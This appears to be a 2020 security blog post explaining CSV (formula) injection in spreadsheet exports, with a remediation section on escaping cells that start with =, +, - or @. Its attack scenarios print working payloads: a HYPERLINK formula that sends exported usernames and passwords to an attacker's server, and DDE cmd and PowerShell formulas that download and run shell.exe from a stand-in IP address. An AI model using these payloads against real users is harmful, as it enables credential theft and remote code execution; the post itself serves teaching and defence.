October 5, 2020

Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection

Here's something a lot of you might not have thought much about: security vulnerabilities in your Excel sheet. Well, not in your Excel sheet, but how you transfer or export data onto them.

Many web applications provide functionality to export data onto spreadsheet files such as .CSV or .XLS. This data generally contains sensitive information that should be handled safely and securely. In web applications, 'risk handling' is related to input and output trust boundaries. In case of a CSV Injection attack, (output of) exporting the data to a spreadsheet could compromise the victim's machine (untrusted output).

CSV Injection occurs when the data in a spreadsheet cell is not properly validated prior to export. The attacker usually injects a malicious payload (formula) into the input field. Once the data is exported, the spreadsheet executes the malicious payload on the assumption of a standard macro. This leads to the execution of arbitrary commands on target machine potentially even leading to a complete 'command and control' on the target system.

If that doesn't sound fun, it's because it's not. So how do CSV Injection attacks work? And how do you protect yourself against them?

Formula Injection

The Sum function is a standard formula to add two or more cells in Excel.

Seems pretty straightforward, right? So how does something like this actually turn rogue and attack the target system?

Here's how it happens. Before displaying the spreadsheet content to the user, Excel first looks for formulae which begin with '=' sign followed by the function to execute it. These formulae could crafted in such a way that malicious payloads that get executed when the CSV file is opened by the victim

There's 3 key attacks that can be launched using a malicious formula:

  • Hijacking the user’s computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524
  • Hijacking the user’s computer by exploiting the user’s tendency to ignore security warnings in spreadsheets that they downloaded from their own website
  • Exfiltrating contents from the spreadsheet, or other open spreadsheets.

This attack can be easily leveraged by an attacker by injecting different types of formulae into the cell:

  1. Using Excel's HYPERLINK function
  2. Using Windows Command 'cmd'

HYPERLINK

The formula HYPERLINK is used to exfiltrate confidential data from the cells. This attack is dangerous because HYPERLINK will not prompt any warnings when the victim clicks on the malicious link,  and the cells containing confidential data are directly sent to the Attacker's Web Server set up to capture such request payloads.

For example, consider a website that allows an administrator to export all user details: Username, Password, Transactions history and so on. If a malicious attacker sets his/her name as follows:

=HYPERLINK("http://localhost:4444?leak="&B2&B3&C2&C3,"Pls click for more info")

When the victim opens the file and clicks on the link, the data is directly sent to the remote server.

Read more: We ensure that your code is more secure than ever

Attack Scenario

Let's see how the HYPERLINK is used by the malicious user to steal confidential data from the administrator exported .csv file.

The malicious user (Attacker) sets name (=HYPERLINK(malicious link)) in his/her profile. When victim exports the user data as .csv file and then opens the userdetails1.csv in , the  (HYPERLINK) gets executed and the name field renders a link

.


Figure 1: The attacker sets a malicious Name (=HYPERLINK(malicious link)) in his profile


Figure 2: When victim open the exported CSV file, the attacker name shows the option of link

Now when the victim (administrator) clicks on the link, the other cells containing sensitive data like username and password are sent to the attacker's server along with the URL (captured on a Web Server)


Figure 3: When the victim clicks on the link, the CSV file containing confidential data is captured on the attacker’s server

Command Execution

Here's where it gets gets interesting; an attacker can use the DDE (Dynamic Data Exchange) formula to execute application commands on a victim’s MS Excel Windows.

For example, to open the calculator application on the target machine one would use the following:

=cmd|' /C calc'!A1

However, this rather unassuming command can be extended to potentially cause devastating attacks on a target user. Unvalidated spreadsheet files with such DDE formulae could lead to users unwittingly succumbing to a complete command and control through a shell attack.

Read more: What does Security Regression Mean?

For example, consider the following command that sets a person's name in a spreadsheet:

-2+3+cmd|'/C explorer http://192.168.0.12:8/shell.exe'!A1&cmd|' /C  %USERPROFILE%Downloadsshell.exe'!A1

Spreadsheet applications usually throw warnings when it detects malicious macros/scripts within native files. However, when users ignore or "accept" such warnings, injected scripts such as the above could render target systems completely compromised.

The above mentioned attack could also be exploited using Windows PowerShell,

=cmd|' /C powershell Invoke-WebRequest "http://192.168.0.8:8/shell.exe" -OutFile "$env:Tempshell.exe"; Start-Process "$env:Tempshell.exe"'!A1

Note: To exploit the command execution with the PowerShell, the victim machine should have PowerShell version 5.0 or above.

Remediation Strategy

Similar to input validation of user-supplied data, application engineers must validate data prior to exporting them to native file formats, especially .csv and/or .xls files.

A strategy to mitigate Formula Injection would be to prefix a single quote (') for every formula which begins with the following symbols:

  • Equals to ("=")
  • Plus ("+")
  • Minus ("-")
  • At ("@")

This will ensure that the cell will not be intercepted as formula and even if the cell contains formula, the formula will be displayed as is.